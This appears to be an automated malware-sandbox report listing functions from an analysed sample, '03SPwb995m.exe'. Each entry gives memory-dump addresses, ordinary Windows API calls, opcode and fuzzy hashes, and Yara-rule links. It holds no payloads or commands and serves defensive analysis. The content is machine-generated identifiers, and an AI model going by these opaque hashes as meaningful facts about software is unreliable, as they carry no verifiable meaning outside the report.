                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 09b9c6182af49382b7ebc19591939587768f67b7afdae23becf2ba27108845f9
                                                                                                                • Instruction ID: 3b29ca78a6f371fa077cef25bc49d6749e6bb53ad7ca2d8dffa99527ec8eec5d
                                                                                                                • Opcode Fuzzy Hash: 09b9c6182af49382b7ebc19591939587768f67b7afdae23becf2ba27108845f9
                                                                                                                • Instruction Fuzzy Hash: 3C5146B0D006498FDB14CFA9D5487EEBBF4FF48318F2084A9E459A7350C7B95944CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BBAF68, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB1AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 72c452909229be9d9938b4f9d215c40cc7288823191f34c74b965f4074e62999
                                                                                                                • Instruction ID: 0883fb6f75c7c88af4c7f8099d1020008502bc7f161f048268c06073d7dafa54
                                                                                                                • Opcode Fuzzy Hash: 72c452909229be9d9938b4f9d215c40cc7288823191f34c74b965f4074e62999
                                                                                                                • Instruction Fuzzy Hash: 3C7113B0A00B058FD725DF69D0447AAB7F5FF88308F10896DD49AD7A40DBB5E84A8F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BB54D5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02BB5591
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 0460e9b84e366a9e3a6a98275eae3b71a231749e95be71fcaa921aae4a84fd2e
                                                                                                                • Instruction ID: 67cc8fe0a00137fbffe59f87d019da9ea2c00a2b8be2cba49626156c43d54f2b
                                                                                                                • Opcode Fuzzy Hash: 0460e9b84e366a9e3a6a98275eae3b71a231749e95be71fcaa921aae4a84fd2e
                                                                                                                • Instruction Fuzzy Hash: C541E470C00618CFDB24DFA9C8447DEBBB9BF48304F64856AD409AB251D7B55986CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BB3F7C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02BB5591
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: c79a260706592539fa8652d0a9cd694ed8ae8c017745730d825d62246d74da06
                                                                                                                • Instruction ID: c257bd7414a1d7afbb8c72e6b848fddb2e840b1db58902d9d5c97ca53bb1fb58
                                                                                                                • Opcode Fuzzy Hash: c79a260706592539fa8652d0a9cd694ed8ae8c017745730d825d62246d74da06
                                                                                                                • Instruction Fuzzy Hash: 4B41E3B0C00718CBDB24DFA9C8447DEBBB9BF48304F50856AD409AB255D7B56986CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BBD478, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BBD4FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 821e0174830e2e26f58afe7ab52cc15521e405b1cd0f4f2b92e77dd2ec118577
                                                                                                                • Instruction ID: 89936b288a01fe09e0d150146cdede32222bd4628942adfb7c39a2c4c8d2c2ef
                                                                                                                • Opcode Fuzzy Hash: 821e0174830e2e26f58afe7ab52cc15521e405b1cd0f4f2b92e77dd2ec118577
                                                                                                                • Instruction Fuzzy Hash: 3521D5B59002199FDB10CFA9D584ADEBBF8FF48324F14846AE954A3311D379A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BBA298, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02BBB229,00000800,00000000,00000000), ref: 02BBB43A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 25833c7108e03c0152fbce2bc62851c03c1984e0ea7b53a3a6ce0e73b6e6843e
                                                                                                                • Instruction ID: 189c5f62f13b9f063028a45fe1fc631f8903c9a6cf7a08a3ce360174577aabb4
                                                                                                                • Opcode Fuzzy Hash: 25833c7108e03c0152fbce2bc62851c03c1984e0ea7b53a3a6ce0e73b6e6843e
                                                                                                                • Instruction Fuzzy Hash: E411D6B69006099FCB10CF9AD444BEEBBF8FF58314F14846AE915A7700C3B5A545CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BBB3C9, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02BBB229,00000800,00000000,00000000), ref: 02BBB43A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 326e66b449535298fbdfb7723bf3f4c76d20b0734f7af6da0e186ea6df5ba35c
                                                                                                                • Instruction ID: 95f524ae8ebcb4b9d3ace56e08b84bf70a224258ede91ab68a63a11a830a4726
                                                                                                                • Opcode Fuzzy Hash: 326e66b449535298fbdfb7723bf3f4c76d20b0734f7af6da0e186ea6df5ba35c
                                                                                                                • Instruction Fuzzy Hash: 3211D6B69002498FCB10CFA9D444BEEBBF5FF98314F14846AD855B7600C7B5A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BBB148, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB1AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 4890a5a169868dcf41ac55d345da9426dc9e53da9378442f334289510010ee21
                                                                                                                • Instruction ID: 6cc7f46a0ed04ca4161f8bfd5944e1eaab4c1826b66b68f59dcf40de4f7a8c2f
                                                                                                                • Opcode Fuzzy Hash: 4890a5a169868dcf41ac55d345da9426dc9e53da9378442f334289510010ee21
                                                                                                                • Instruction Fuzzy Hash: EF11E6B5D006498FCB10CF9AD444BDEFBF8EF48228F14846AD859B7600C3B5A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127D4D8, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 872eec3ac8ffa36a32aa5e2718f8622b44cd3d29a171223bd6669deb0f6117d1
                                                                                                                • Instruction ID: 5cea311bb8c8a3fe6832d79dc9ec948049c4d2cea70f7cfd2c261bac74773b95
                                                                                                                • Opcode Fuzzy Hash: 872eec3ac8ffa36a32aa5e2718f8622b44cd3d29a171223bd6669deb0f6117d1
                                                                                                                • Instruction Fuzzy Hash: E12125B1510248DFDF01CF94E9C0B17BF65FF88328F248569E9050B206C376D856CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677902913.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0705e89d2e191c6592d118c6365f76a5ff263a67b95ead3a883c530640775ac2
                                                                                                                • Instruction ID: 4a26d13da4e82f437aed209c89b36a46feea05e1eb5fa8d21f4ee1f2857eaf7e
                                                                                                                • Opcode Fuzzy Hash: 0705e89d2e191c6592d118c6365f76a5ff263a67b95ead3a883c530640775ac2
                                                                                                                • Instruction Fuzzy Hash: 1F214570514308DFDB11EFA4D8C0B16BB65FB84354F20C96DD9490B2C2C376D84BCA61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127D4D3, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction ID: fdd750c7a9bc89960aaaa0cf8233dffaea17081d3247fd5f4ed3f2e476c42b66
                                                                                                                • Opcode Fuzzy Hash: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction Fuzzy Hash: 7711D3B6404285DFCF12CF54E5C4B16BF72FF84324F2486A9D9050B656C33AD45ACBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128D017, Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677902913.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction ID: b82286bd45a92b93bc5e01c7f73818fe004112175ad0a9592c74814daa3963aa
                                                                                                                • Opcode Fuzzy Hash: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction Fuzzy Hash: 8B11EE75404284CFDB02CF54D5C0B15BB62FB44314F24C6A9D9494B696C33AD40BCB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127D745, Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f6cee179af320437eac5cb08f8b8906f677117334bcbe06ecf5e8f7e3742543
                                                                                                                • Instruction ID: 00d2f644bbc3e0c93c7096f20120dfd2104605a28be5cf7e3bf3838d96eb6f2e
                                                                                                                • Opcode Fuzzy Hash: 0f6cee179af320437eac5cb08f8b8906f677117334bcbe06ecf5e8f7e3742543
                                                                                                                • Instruction Fuzzy Hash: 76012B714143C89AE7144E99CDC4B67FF9CDF81278F08851AEF041F242D7799844CAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127D744, Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b9e4371797b25194bec2b2b38e21ac4651038392b09cc2bcf3b29398ff2015a
                                                                                                                • Instruction ID: 41982c721474039cb5aa2d53a38cc76d711fa83e88c1d263ad0853f5ea5f64b6
                                                                                                                • Opcode Fuzzy Hash: 0b9e4371797b25194bec2b2b38e21ac4651038392b09cc2bcf3b29398ff2015a
                                                                                                                • Instruction Fuzzy Hash: E1F0C2714042849AE7148E59CCC4B63FF9CEF81234F18C45AEE081B286C3799844CAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 008FA2A9, Relevance: .9, Instructions: 896COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677391759.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.677383055.00000000008F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.677498178.00000000009B0000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                                                                                • Instruction ID: 047e6c73b2cc168872ddf0039ae9305ef372c034d07092511bbc3a14929810bf
                                                                                                                • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                                                                                • Instruction Fuzzy Hash: 8662696144F7C19FC7134B746DB56E2BFB1AE6721871E44CBC4C0CE1A3E22A195AE722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02BBDC0C, Relevance: .3, Instructions: 265COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e544db8615cb1f4d1e2cad20ea4bdf47aa89aa1b4cc1adf8818f3b915330af2d
                                                                                                                • Instruction ID: 0e35ed7626818ab3b793549b003f5654cf0824d42c366ed1a86ac4e6fd4afb8e
                                                                                                                • Opcode Fuzzy Hash: e544db8615cb1f4d1e2cad20ea4bdf47aa89aa1b4cc1adf8818f3b915330af2d
                                                                                                                • Instruction Fuzzy Hash: 17A16F36E0021A8FCF06DFB5C8445EDB7B2FF85304B1585AAE805BB261EBB5A955CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: 03SPwb995m.exe PID: 5596 Parent PID: 1364 03SPwb995m.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 029652B2, Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02965422
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 7d17e9506486b9e1be4eba2faf232bfd0184802ccee929926a8c7d5dee7d3367
                                                                                                                • Instruction ID: d6f40d8983faa1ebf10a784a7b5958c5df7988fe25e0152c35e3f5602c8288db
                                                                                                                • Opcode Fuzzy Hash: 7d17e9506486b9e1be4eba2faf232bfd0184802ccee929926a8c7d5dee7d3367
                                                                                                                • Instruction Fuzzy Hash: 0151F1B1C00249AFDF11CFA9C984ADEBFB5FF48314F69816AE818AB220D7759855CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02963E1C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02965422
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: a1e1ac809d3f6a9898f7736f6c575d12a6c506e91fff403f322a77c47d54841b
                                                                                                                • Instruction ID: a451f19d323d066731b7df08e929da1a505e8ec1be0627d94f74e95346daf099
                                                                                                                • Opcode Fuzzy Hash: a1e1ac809d3f6a9898f7736f6c575d12a6c506e91fff403f322a77c47d54841b
                                                                                                                • Instruction Fuzzy Hash: E351BDB1D103099FDB14CFA9C984ADEBBF5FF48314F65862AE819AB210D774A845CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02966AFC, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 02967D79
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: a4ba50b3f40093dcf286e355efbfc6ca265c68ef7d8575a08b4861c996ce9701
                                                                                                                • Instruction ID: 06b6c642c7cd407523ff4d06365b0a876e9d073a62856c8b34f5daf81d7f44e8
                                                                                                                • Opcode Fuzzy Hash: a4ba50b3f40093dcf286e355efbfc6ca265c68ef7d8575a08b4861c996ce9701
                                                                                                                • Instruction Fuzzy Hash: B1410BB49003059FDB14CF99C488AAAFBF9FF88318F248859E51967361D774A845CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0296C959, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0296C9E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2118026453-0
                                                                                                                • Opcode ID: 155ffd2f979a9418dc19de57488b82237269aecabd89f2b163cf8ef58030d829
                                                                                                                • Instruction ID: ec8fbe3f178202f7c51bdda4b2977e5a6163fade0dd462c4b7573aeacb2723d6
                                                                                                                • Opcode Fuzzy Hash: 155ffd2f979a9418dc19de57488b82237269aecabd89f2b163cf8ef58030d829
                                                                                                                • Instruction Fuzzy Hash: F931C4B58053848FDB20DFA9E64D3AE7FF8FB49318F14846AE484A7242C7796905CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02966DE0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02966E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: de3c6884e1dcd1977c13069b08d78ee911b61d4bd9ebcc0f865cc9cc4f57c464
                                                                                                                • Instruction ID: 7c73d71f47ddd77dc2f51c66be7754dcff028ecad1e7e122426475c7db517716
                                                                                                                • Opcode Fuzzy Hash: de3c6884e1dcd1977c13069b08d78ee911b61d4bd9ebcc0f865cc9cc4f57c464
                                                                                                                • Instruction Fuzzy Hash: B721E3B59002489FDB10CFE9D584AEEBFF8EB48324F14842AE954A3310D778A955CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02966DE8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02966E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: f952abab8bb80c43da1e1b3282307c54bd74315b25135b756ae1ac37c9c0b2f2
                                                                                                                • Instruction ID: 19fb14f9876f0afcc0807cd0c2099f1acd01be20d096ec54384725060af50572
                                                                                                                • Opcode Fuzzy Hash: f952abab8bb80c43da1e1b3282307c54bd74315b25135b756ae1ac37c9c0b2f2
                                                                                                                • Instruction Fuzzy Hash: AC21D5B59003499FDB10CFE9D584AEEBBF8FB48324F14842AE955A3310D778A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0296C968, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0296C9E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2118026453-0
                                                                                                                • Opcode ID: 9275e44df566a5d0958e04bedffd7d7928e74d20c8890d06eb0bcd2e551cd111
                                                                                                                • Instruction ID: 487a709b788740fd16b6a22e23950797082642e634d4ff4d1ab79dd8117b357e
                                                                                                                • Opcode Fuzzy Hash: 9275e44df566a5d0958e04bedffd7d7928e74d20c8890d06eb0bcd2e551cd111
                                                                                                                • Instruction Fuzzy Hash: 0D116DB19013458FDB20DFA9D6497AEBBF8FB48314F24842AE485A3741CB796905CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 029634AC, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02964396
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: dd1a9299f284235f1fb996f050c69ccd7de9a7eafeaeea8771bddd01395beaaa
                                                                                                                • Instruction ID: ca8b5226cb85ecc24de0a5275309005965e8b0cba12fc5e2ca41c9c71d00a6b1
                                                                                                                • Opcode Fuzzy Hash: dd1a9299f284235f1fb996f050c69ccd7de9a7eafeaeea8771bddd01395beaaa
                                                                                                                • Instruction Fuzzy Hash: 3D11F3B19007498FCB20CF9AD548BDEBBF8EB49224F14846AD859A7200D375A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0296432A, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02964396
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 6dd877711129f5e4276c23150b0082c68f2f2dcf3eb51bfa3b5384dff12943fd
                                                                                                                • Instruction ID: 9a38aa0c038eb427784bebf0561a154dcd51123c4805da23668311206dcd738f
                                                                                                                • Opcode Fuzzy Hash: 6dd877711129f5e4276c23150b0082c68f2f2dcf3eb51bfa3b5384dff12943fd
                                                                                                                • Instruction Fuzzy Hash: F41143B1C003498FCB20CF9AD548BDEFBF8EB88224F14846AD459B7200C378A546CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 010FD53C, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6d4120fedfa2786b320155cccb144e85794e7ae77a4e16e0342a2356f018d62
                                                                                                                • Instruction ID: 6f374949c2d34e86a3d9054016449208c29165c6a2240bb407cedb23470c6e5c
                                                                                                                • Opcode Fuzzy Hash: d6d4120fedfa2786b320155cccb144e85794e7ae77a4e16e0342a2356f018d62
                                                                                                                • Instruction Fuzzy Hash: 752136B1500240DFCF01DF94D8C5B1ABFA5FB88728F2485ADEA450B646C336D456CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 010FD450, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0457f1df221b050d3705773f450c8da176b4b5a4c8298d1fd12e146d425e834b
                                                                                                                • Instruction ID: 8c91fce6844037add7f98763c0aa837a726a154499c872db3192ebd28d2d28c9
                                                                                                                • Opcode Fuzzy Hash: 0457f1df221b050d3705773f450c8da176b4b5a4c8298d1fd12e146d425e834b
                                                                                                                • Instruction Fuzzy Hash: A52148B1500240DFDF01DF94D8C5B6BBFA5FB84324F2085ACEA450B606C736E446CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0110D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918647537.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5b705acec2cf2a6a1d841e7c0ce46bc25e44f202991e3979232a3013617dfa95
                                                                                                                • Instruction ID: 8f5f5a9c95ffe5b8dea24f230926d164ac13d5a4224bd63b28171790b4924fb1
                                                                                                                • Opcode Fuzzy Hash: 5b705acec2cf2a6a1d841e7c0ce46bc25e44f202991e3979232a3013617dfa95
                                                                                                                • Instruction Fuzzy Hash: 272103B1904244DFDF1ACFD4E8C0B16BB65EB84354F20C969D84D4B28AC7B6D847CA62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 010FD537, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction ID: a2b1ecedb8116ce03d5469d623e0bd126ea818936ee2a4e82d2d53d3220e12fc
                                                                                                                • Opcode Fuzzy Hash: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction Fuzzy Hash: 3211B1B6404284DFCB02CF54D5C4B16BFB2FB88324F2486ADD9494B656C336D55ACBA1
